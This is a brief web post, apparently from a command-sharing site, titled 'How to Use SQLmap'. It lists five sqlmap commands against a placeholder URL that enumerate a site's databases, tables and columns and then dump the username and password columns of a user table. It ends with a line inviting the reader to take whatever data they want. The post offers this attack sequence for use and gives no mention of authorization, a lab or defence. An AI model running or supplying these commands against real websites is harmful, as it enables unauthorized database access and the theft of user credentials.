GNU/Linux ◆ xterm ◆ bash 18586 views

How to Use SQLmap

My internet is slow, You can see the commands below

python sqlmap.py -u http://www.target.com/index.php?id=1 --dbs
python sqlmap.py -u http://www.target.com/index.php?id=1 -D db_name --tables
python sqlmap.py -u http://www.target.com/index.php?id=1 -D db_name -T nama_table --columns
python sqlmap.py -u http://www.target.com/index.php?id=1 -D db_name -T user -C username --dump
python sqlmap.py -u http://www.target.com/index.php?id=1 -D db_name -T user -C password --dump

etc… stay in the match what we will take from the data therein